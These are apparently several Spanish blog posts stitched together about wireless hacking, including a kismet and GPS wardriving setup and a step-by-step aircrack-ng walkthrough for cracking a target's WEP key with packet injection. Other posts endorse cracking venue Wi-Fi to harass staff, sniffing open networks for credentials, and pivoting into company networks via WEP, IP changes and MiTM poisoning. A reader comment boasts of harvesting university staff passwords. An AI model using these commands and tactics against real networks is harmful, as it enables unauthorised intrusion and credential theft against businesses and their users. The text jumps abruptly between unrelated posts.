El esquema de lo que tenemos en mente es el siguiente:

Podemos ver tres antenas sobr ela torre triangular, las identifiqué como “verde”, “roja” y “negra”. El color verde simboliza nuestra LAN y nuestra WLAN y la roja nuestra DMZ donde se encuentran nuestros servidores con nombres de personajes de los simpsons.
La idea principal de todo esto es tener dos redes separadas, nuestra WLAN y LAN que simplemente tenga acceso a internet y que nuestra DMZ tenga entrada y salida a internet, mediante una VPN, un tunel o como sea, la idea es dejar abierto los servidores al público y en algun momento (cuando armemos el proyecto) entregar accesos a shell para servicios de anonimato para quienes lo necesiten.

1. Te quedas en el lugar sin tener acceso a wifi
2. Te vas indignado del lugar ya que no te prestaron internet
3. Te quedas en el lugar y te conectas a una red de otro lugar
4. Crackeas la clave y te quedas en el lugar
5. Te vas del lugar, crackeas la red y te vas a otro lugar a conectarte

De las 5, yo prefiero dos de ellas: la 3 y la 5. Generalmente son claves WEP y no te demoras nada en obtener la contraseña. Que te digan que el wifi es solo para los dueños o solo para usos administrativo, te dan más ganas de querer conectarte a intrusear qué hay. Es muy típico que tengan la password del router por defecto (admin/admin), puedes hacer MiTM, etc.
Lo que yo no entiendo, es por qué tienen una red WiFi en los pubs o restaurantes “sólo para usos administrativos”. Ahora viene mi crítica: Si realmente quieren usar una red sólo para usos administrativos conectense por cable de red o al menos protejan las claves de las redes con un cifrado más potente que el WEP. Está bien si entendemos que no toda la gente sabe crackear redes y no todos van a tener el tiempo de hacerlo, de las 1000 personas que visitan el lugar quizá sólo 1 sabe hacerlo, pero basta con una para que te puedan fastidiar, o por último no le pongas el nombre del lugar, lo hacen sólo para llamar la atención (¿publicidad?).
En fín, si voy a un lugar donde SI hay wifi pero no quieren decirme que clave es, entonces la crackeo y de pasada, los fastidio un poco. ¿Cómo los podemos fastidiar?

1. Nos conectamos sea como sea y sólo por molestar, llamamos al garzón o camarero y le pedimos que si puede reiniciar el router, por que el internet anda muy lento.
2. Desconectarlos de internet.
3. Nos ponemos frente al dueño o frente a los camareros, con el notebook, dejando en claro que “estoy navegandooooo”
4. Imprimir en un papel la clave de WiFi y pegarla en la entrada

¿Qué se puede hacer cuando nos encontramos con una red insegura abierta?
Facilmente podemos snifear todo el trafico que está pasando por la red capturando información personal y privada, pudiendo hacer lo que queramos con ella. Se puede prestar para realizar phishing, robo de identidad, claves y accesos para sitios bancarios, robo de credenciales para distintos servicios como twitter, gmail, msn, etc.

¿Cómo puedo aprovecharme de esta campaña?
Fácil. Basta con instalar un honeypot en varios puntos de la ciudad para que la gente piense que “alguien, amablemente, libero su wifi”.

Existen otras formas para ayudar a que la gente se comunique, pero esta me parece realmente tonta.

¿Y cómo termina todo esto?
Por ejemplo, con ésto.

Como dice mi querido amigo Clark en un comentario de un post anterior:

@Zerial, con respecto a este tema te encuentro toda la razon, sin tener mucho conociento en el tema hice algunas pruebas por una wifi con cifrado wep de una universidad X y chan! claro despues de un rato de acostumbramiento comence a adquirir user y pass de los funcionarios, pc’s, servidores y mas informacion, claro ahora estoy con la duda de dar a conocer sus problemas?, vuelvo a repetir no tengo muchos conocimientos en el tema pero hacerlo fue gratificante como dice @andres. ademas puedo decir que me encanto y me pico el bichito de la curiosidad lo que me lleva a documentarme mejor en el tema! y ahora se que alguien siempre esta escuchando del otro lado :s.

No hay que ser un experto, no hay que ser un jajajahacker ni un experto en seguridad informática, simplemente hay que tener las herramientas para hacerlo y ni si quiera saber ocupar las herramientas al 100%, actualmente con la información que hay en el manual de ettercap es posible lograr muchas cosas. Al igual que en una conversación telefónica, celular o lo que sea, siempre puede haber un tercero que esté filtrando la información, siempre puede existir un “hombre en el medio” (MiTM).
No se trata de un tema de paranoia ni nada por el estilo, pero creo que debemos tomar conciencia y tener conocimiento de donde nos estamos conectando, a traves de quien estamos pasando, etc.

En mi caso, cuando me conecto a unas de estas redes no dejo de hacer las cosas que hago siempre, pero me aseguro de que nadie esté “escuchando” lo que estoy haciendo. Si me aparece un certificado falso, obviamente no lo voy a aceptar (cosa que el común de la gente si lo hace), no voy a hacer transferencias ni ingresar a la cuenta de mi banco, y si trafico información importante me aseguro de que la información viaje por un canal seguro.

Tal véz deba existir algo que regule éste tipo de cosas.

Se llama wardriving a la búsqueda de redes inalámbricas Wi-Fi desde un vehículo en movimiento. Implica usar un coche o camioneta y un ordenador equipado con Wi-Fi, como un portátil o una PDA, para detectar las redes. Esta actividad es parecida al uso de un escáner para radio.
(Citado textualmente desde Wikipedia.)

La idea de este post, es hacer un mini tutorial de cómo hice funcionar (gracias a la ayuda de Nozelf) el GPS en GNU/Linux junto a las herramientas de sniffing kismet y a gpsdrive. Debo dejar claro que no enseñaré a configurar el bluetooth ni nada por el estilo, asumo que todo eso ya está configurado.

Lo primero que haremos será buscar el dispositivo y asociarlo a nuestra máquina, para esto usaremos hcitool y rfcomm.

[root@balcebu ~]# hcitool scan
Scanning ...
00:02:C7:15:B3:A3 BTGPS 15B3A3
[root@balcebu ~]# rfcomm bind /dev/rfcomm0 00:02:C7:15:B3:A3
[root@balcebu ~]#

Para ver si el GPS está entregando algún tipo de información, podemos hacer un cat directamente al dispositivo.

[root@balcebu ~]# cat /dev/rfcomm0
PGSA,A,1,,,,,,,,,,,,,50.0,50.0,50.0*05
$GPRMC,000211.991,V,0000.0000,N,00000.0000,E,0.000000,,101102,,*0A
$GPVTG,,T,,M,0.000000,N,0.000000,K*4E
$GPGGA,000212.991,0000.0000,N,00000.0000,E,0,00,50.0,0.0,M,0.0,M,0.0,0000*76
$GPGSA,A,1,,,,,,,,,,,,,50.0,50.0,50.0*05
$GPRMC,000212.991,V,0000.0000,N,00000.0000,E,0.000000,,101102,,*09
$GPVTG,,T,,M,0.000000,N,0.000000,K*4E
$GPGGA,000213.991,0000.0000,N,00000.0000,E,0,00,50.0,0.0,M,0.0,M,0.0,0000*77
$GPGSA,A,1,,,,,,,,,,,,,50.0,50.0,50.0*05
$GPRMC,000213.991,V,0000.0000,N,00000.0000,E,0.000000,,101102,,*08
$GPVTG,,T,,M,0.000000,N,0.000000,K*4E
$GPGGA,000214.991,0000.0000,N,00000.0000,E,0,00,50.0,0.0,M,0.0,M,0.0,0000*70
$GPGSA,A,1,,,,,,,,,,,,,50.0,50.0,50.0*05
$GPRMC,000214.991,V,0000.0000,N,00000.0000,E,0.000000,,101102,,*0F
$GPVTG,,T,,M,0.000000,N,0.000000,K*4E
$GPGGA,000215.991,0000.0000,N,00000.0000,E,0,00,50.0,0.0,M,0.0,M,0.0,0000*71

Hasta ahora todo en orden. Ahora debemos configurar el kismet, el fichero de configuración que tengo yo es:

version=2007.09.R1
servername=Kismet
suiduser=zerial
networkmanagersleep=true
source=iwlagn,wlan0,iwl
vapdestroy=true
channelhop=true
channelvelocity=5
channelsplit=true
defaultchannels=IEEE80211b:1,6,11,2,7,3,8,4,9,5,10
defaultchannels=IEEE80211g:1,6,11,2,7,3,8,4,9,5,10
defaultchannels=IEEE80211a:36,40,44,48,52,56,60,64
defaultchannels=IEEE80211ab:1,6,11,2,7,3,8,4,9,5,10,36,40,44,48,52,56,60,64
tcpport=2501
allowedhosts=127.0.0.1
bindaddress=127.0.0.1
maxclients=5
gps=true
gpshost=localhost:2947
gpsmodelock=false
alert=NETSTUMBLER,10/min,1/sec
alert=WELLENREITER,10/min,1/sec
alert=LUCENTTEST,10/min,1/sec
alert=DEAUTHFLOOD,10/min,2/sec
alert=BCASTDISCON,10/min,2/sec
alert=CHANCHANGE,5/min,1/sec
alert=AIRJACKSSID,5/min,1/sec
alert=PROBENOJOIN,10/min,1/sec
alert=DISASSOCTRAFFIC,10/min,1/sec
alert=NULLPROBERESP,10/min,1/sec
alert=BSSTIMESTAMP,10/min,1/sec
alert=MSFBCOMSSID,10/min,1/sec
alert=LONGSSID,10/min,1/sec
alert=MSFDLINKRATE,10/min,1/sec
alert=MSFNETGEARBEACON,10/min,1/sec
alert=DISCONCODEINVALID,10/min,1/sec
alert=DEAUTHCODEINVALID,10/min,1/sec
allowkeytransmit=true
writeinterval=300
trackivs=false
sound=false
soundplay=/usr/bin/play
sound_new=${prefix}/share/kismet/wav/new_network.wav
sound_traffic=${prefix}/share/kismet/wav/traffic.wav
sound_junktraffic=${prefix}/share/kismet/wav/junk_traffic.wav
sound_alert=${prefix}/share/kismet/wav/alert.wav
speech=false
festival=/usr/bin/festival
flite=false
darwinsay=false
speech_voice=default
speech_type=nato
speech_encrypted=New network detected, s.s.i.d. %s, channel %c, network encrypted.
speech_unencrypted=New network detected, s.s.i.d. %s, channel %c, network open.
ap_manuf=ap_manuf
client_manuf=client_manuf
metric=false
waypoints=true
waypointdata=/home/zerial/.gpsdrive/way.txt
waypoint_essid=true
alertbacklog=50
logtypes=dump,network,csv,xml,weak,cisco,gps
trackprobenets=true
noiselog=false
corruptlog=true
beaconlog=true
phylog=true
mangledatalog=true
fuzzycrypt=wtapfile,wlanng,wlanng_legacy,wlanng_avs,hostap,wlanng_wext,ipw2200,ipw2915
fuzzydecode=wtapfile,radiotap_bsd_a,radiotap_bsd_g,radiotap_bsd_bg,radiotap_bsd_b,pcapfile
netfuzzycrypt=true
dumptype=wiretap
dumplimit=0
logdefault=Kismet
logtemplate=%n-%d-%i.%l
piddir=/var/run/
configdir=%h/.kismet/
ssidmap=ssid_map
groupmap=group_map
ipmap=ip_map

Nota: Tuve que instalar una version antigua de Kismet ya que tuve conflictos con la más nueva.
Cuando tengamos configurado kismet y, antes de ejecutarlo, debemos setear nuestra interfáz en modo monitor y correr gpsd. Lo primero va a depender del driver que estemos usando.
En los casos más comunes son:

Intel, broadcom, ralink, realtek, entre otas:
# iwconfig wlan0 mode monitor
En la mayoría:
# airmon-ng wlan0 start
En las con madwifi (atheros, zydass)
# wlanconfig ath create wlandev wifi0 wlanmode monitor
Y el gpsd lo corremos:
# gpsd -F /tmp/gps.socket /dev/rfcomm0
Ya podemos arrancar el kismet. La pantalla que veremos será algo similar a:

Son todas las redes que captura nuestra interfáz wireless. Pero a lo que nosotros nos interesa, es el fichero Way Points que se está guardando, según nuestro kismet.conf, en el directorio ~/.gpsdrive/way.txt.

[zerial@balcebu ~]$ cat ~/.gpsdrive/way-ssid.txt
GASPAR -33.442875 -70.598656
RED_ANDRES -33.442886 -70.598724
EDSOIT -33.442875 -70.598656
jaguar house 0.000000 0.000000
Visitas Jaguar 0.000000 0.000000
Rodrigo_2008 -33.442875 -70.598656
<no ssid> -33.442886 -70.598724
costa2 -33.442881 -70.598656
SUPERTALDO -33.442886 -70.598724
Fidelizador.com -33.442881 -70.598656
CDAguilucho -33.442875 -70.598656
CDAguilucho -33.442875 -70.598656
CDAguilucho -33.442881 -70.598656
CDAguilucho -33.442881 -70.598656
WebSTAR -33.442875 -70.598656
Prueba -33.442881 -70.598656</no>

Lo que vemos son los nombres de las señales, longitud y latitud. Ya con toda ésta información, podemos “graficarla” en algun mapa, por ejemplo, el de gpsdrive.

Aún no configuro bien ni cargo los mapas que corresponden, por lo que el GPSDrive me muestra la información un tanto ilegible, pero podemos ver que si está posicionando la información capturada por kismet. Lamentablemente no puedo hacer más zoom.
Otra opción sería traspasar los datos de WayPoints a KML para que pueda ser interpretado por Google Earth, tambien podemos introducir las coordinadas manualmente para ir graficando.

La idea es la siguiente, montar una antena en un auto y salir con los portátiles a recorrer la ciudad capturando éste tipo de información y graficandolo en un mapa para luego compartirla y tener un mapa con las redes de la ciudad. El próximo post relacionado a este tema, será cuando haga wardriving, subiré fotos y todo eso.

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.

In fact, Aircrack-ng is a set of tools for auditing wireless networks.

http://aircrack-ng.org

En español y en simples palabras, aircrack-ng es una suite de herramientas que nos permiten auditar redes inalámbricas.

Básicamente, lo que voy a mostrar es cómo encontrar la clave de una red wifi cifrada con WEP. Las herramientas que utilizaremos serán airmon-ng, airodump-ng, aireplay-ng y aircrack-ng.

1. airmon: La usaremos para levantar nuestra interfáz wifi en modo monitor
2. airodump: Para capturar los paquetes que recibe nuestra intefáz en modo monitor
3. aireplay: Para crear una autentificación falsa y poder inyectar paquetes, si es que nuestro hardware lo permite
4. aircrack: Para interpretar los datos capturados con airodump y poder obtener la clave

El primer paso será setear nuestra interfáz wifi en modo monitor, ejecutamos:
# airmon-ng start wlan0
Cambiamos wlan0 por el nombre de nuestra interfáz de red wireless (la podemos ver ejecutando iwconfig). Yo usaré wlan0 para todos los ejemplos. Veremos que se creo otra interface llamada mon0 o algo similar.
Este paso se puede realizar de varias formas dependiendo del driver que usemos, generalmente para las atheros o para las que usen el driver madwifi, tenemos que usar wlanconfig.
# wlanconfig ath0 create wlandev wifi0 wlanmode monitor
Algunos drivers nos permiten cambiar el estado a monitor directamente usando iwconfig:
# iwconfig wlan0 mode monitor
Bueno, una véz lista nuestra interfáz en modo monitor tenemos que ejecutar la utilidad que nos permitirá capturar los datos que están volando. Ejecutamos:

# airodump-ng wlan0
Veremos una pantalla similar a:

De izq. a derecha tenemos:
bssid: mac del access point
beacons: paquetes “basura”
#Data: paquetes útiles
#/s: paquetes por segundo
CH: canal
Enc: cifrado
ESSID: nombre de la señal

Nuestro objetivo es la red llamada “club”. Entonces ejecutamos airodump-ng con los parámetros necesarios para que se encoque unicamente en su mac y su canal.

# airodump-ng -w output --channel 6 --bssid 00:02:CF:B4:DC:5B wlan0

-w : archivo para guardar los datos capturados
–channel: el canal
–bssid: la mac del access point

Utilizaremos dos herramientas más para la inyección de paquetes. La inyección de paquetes nos sirve par “obligar” al roueter a que trafique y nos envie los #Data que necesitamos.
Primero, utilizaremos aireplay-ng para generar una autentificación falsa.

# aireplay-ng -1 64 -a 00:02:CF:B4:DC:5B -h 00:1E:65:CB:29:64 wlan0

Pasamos la MAC de nuestro objetivo bajo el parametro -a y nuestra MAC mediante -h. Con -1 indicamos que usaremos el modo de ataque numero 1.

Mientras esperamos que se generere la autentificación false, dejamos corriendo el aireplay en modo de ataque 3, para que inyecte paquetes.

# aireplay-ng -3 -b 00:02:CF:B4:DC:5B -h 00:1E:65:CB:29:64 wlan0

No explicaré detalladamente los tipos de ataques o los argumentos del aireplay, para eso pueden hacer
# aireplay-ng --help
o bien leer el man.

Cuando tengamos todos los ataques corriendo y el airodump capturando paquetes, podremos ver una pantalla como:

Si nos damos cuenta, podemos ver que el campo #/s esta en 500 lo que quiere decir que esta capturando 500 paquetes por segundo. Con 5 mil o 10 mil paquetes, ya deberiamos tener la password. En el peor de los casos con 20 o 40 mil. El campo #Data nos indica cuantos paquetes hemos capturado.

Por mientras, en otra consola podemos ejecutar el aircrack para que interprete los datos capturados y nos muestre la password WEP.

# aircrack-ng output*.cap

Listo, ya tenemos la clave.

La idea de este post es explicarles, en base a mi experiencia, ambas técnicas. En especial la segunda. Existen muchas empresas que exhiben su red en una señal wifi pública con cifrado WEP y es por esto que quiero dar mayor énfasis a éste tipo de penetración.

En el primer caso, tenemos el ingreso al servidor objetivo mediante alguna vulnerabilidad en los sitios o servicios que hospeda nuestra víctima. En este ejemplo, sólo me referiré al servicio http.
El esquema es mas o menos así:

Lo que quiero explicar es muy simple, tenemos ese portatil que seriamos nosotros, los atacantes, y en el recuadro celeste, los servidores conectados en una red de área local (lan) o en una zona desmilitarizada (dmz). La idea es ingresar a ese recuadro celeste sea como sea, aprovechandose de algun servidor mal configurado o sitio que exponga alguna vulnerabilidad y, cuando estemos dentro, empezar a saltar a los otros servidores y ganar acceso poco a poco a toda la red. Una vez que tengamos acceso a uno de los servidores dentro del área celeste, podremos usar herramientas para detectar otras máquinas, por ejemplo el conocido nmap. Con ésta herramienta, podremos escanear segmentos y subsegmentos completos, hacer pings a múltiples direcciones y a distintos servicios y detectar cosas como la mac de cada equipo, servicios que ofrecen, hostname, etc.

Ahora quiero pasar al punto dos, que es lo que más me gusta.

El cifrado WEP es muy vulnerable y muy fácil de crackear, ya sea 64 o 128bits, en un par de minutos es posible obtener la contraseña. Aunque existen métodos de cifrado como WPA que son mucho más seguros y requiere un diccionario para lograr descifrar la contraseña, lo que hace que sea poco probable de hacerlo.
Bueno, teniendo en cuenta todos estos antecedendes resulta increible que aún existan empresas u organismos (inclusive del gobierno) que estén exponiendo su red vía wifi con cifrado WEP. Pero para nosotros, esto es bueno, ya que nos podemos aprovechar ya sea para obtener internet free o para lo que queramos hacer

Cuando nos logramos conectar a una red wifi de una empresa, la cual está mal configurada y si a ésto, sumamos que el firewall (si es que tienen) está casi configurado por defecto, es todo mucho más fácil. Existen casos en que subsegmentan y dividen la red por departamento o bien aislan los servidores de los pc de escritorio, pero lo hacen solo cambiandoles las direcciones ip, muchas veces ni si quiera crean reglas en el firewall para que estas maquinas no se puedan ver o bien crear una zona desmilitarizada para los servidores. Cuando ésto sucede, nosotros lo único que debemos hacer es camiarnos la IP a una que esté dentro del rango y listo, ya somos parte de “la red de servidores”. Para descubrir que rango de IP debemos usar para ir cambiando de departamento o para ingresar a zonas “privilegiadas”, podemos utilizar la misma herramienta que propuse en el punto 1: nmap. Tambien podemos utilizar algún sniffer como wireshark o ettercap para descubrir información interesante.

Existe el caso donde los servidores no están alojados fisicamente en la misma empresa, pero perfectamente con un poco de ingenio e imaginación podemos obtener la información de acceso a los servidores estándo dentro de la red, filtrando y analizando la informaicón, por ejemplo realizando un ataque MiTM, envenenando la red. Cuando ya formamos parte de la red, es mucho más fácil analizar el tráfico de la red, escanear máquinas e intentar ganar accesos a alguna de ellas y con una red wifi “protegida” con WEP no nos deberíamos tardar más de 1 hora en hacerlo.

Cuando empezamos a escanear nos encontramos con varias sorpresas, desktop con windows, servidores ftp, servidores de impresion, routers sin clave, etc. Nos podemos divertir un rato mandando a imprimir algunos mensajes, enviando mensajes dentro de la red de windows (el típico winpopup ó net send). Es muy típico encontrarse accesos a Terminal Servers, directorios compartidos con Samba (incluso computadores enteros compartidos con Samba), etc.

Largas horas en el techo de la casa, buscando señales, fijando la antena y por obviamente tomando cerveza. Logramos conectarnos a una señal que según estudios anteriores era de 5mbps, con una “potencia” entre -76 y -82dBm logramos conectarnos y descargar a grandes velocidades. En un principio las descargas no bajaban de los 60kb/s y llegando a un tope de 140kb/s, poco a poco fuimos moviendo la antena y apuntandola mejor hasta lograr una conexion optima, descargando a una velocidad entre 250 y 300kb/s. Ya estabamos satisfechos y bajamos al laboratorio a actualizar los PC, a instalar, en fin, a “aprovechar” nuestro gran ancho de banda.
Durante la noche logramos logramos un record de descarga a 620kb/s , conectados con una velocidad de subida y bajada de 6000kbps.
Asi quedo la antena: